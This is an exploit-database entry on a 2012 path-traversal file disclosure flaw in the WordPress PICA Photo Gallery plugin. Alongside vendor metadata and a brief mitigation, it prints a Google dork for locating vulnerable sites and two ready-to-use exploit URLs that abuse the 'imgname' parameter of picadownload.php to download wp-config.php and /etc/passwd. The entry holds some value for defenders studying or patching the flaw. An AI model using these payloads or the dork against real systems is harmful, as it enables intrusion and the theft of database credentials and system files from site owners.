Wordpress Plugins - PICA Photo Gallery Remote File Disclosure Vulnerability

vendor:

PICA Photo Gallery

by:

Sammy FORGIT

7,5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: PICA Photo Gallery

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:wordpress:pica_photo_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

WordPress Plugins – PICA Photo Gallery Remote File Disclosure Vulnerability

A vulnerability in the PICA Photo Gallery plugin for Wordpress allows an attacker to download arbitrary files from the server. This is due to the lack of input validation in the 'imgname' parameter of the 'picadownload.php' script, which allows an attacker to access files outside of the intended directory.

Mitigation:

Input validation should be implemented to prevent attackers from accessing files outside of the intended directory.

Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - PICA Photo Gallery Remote File 
Disclosure Vulnerability
# Version : 1.0
# Link : http://wordpress.org/extend/plugins/pica-photo-gallery/
# Plugins : http://downloads.wordpress.org/plugin/pica-photo-gallery.zip
# Date : 30-05-2012
# Google Dork : inurl:/wp-content/plugins/pica-photo-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd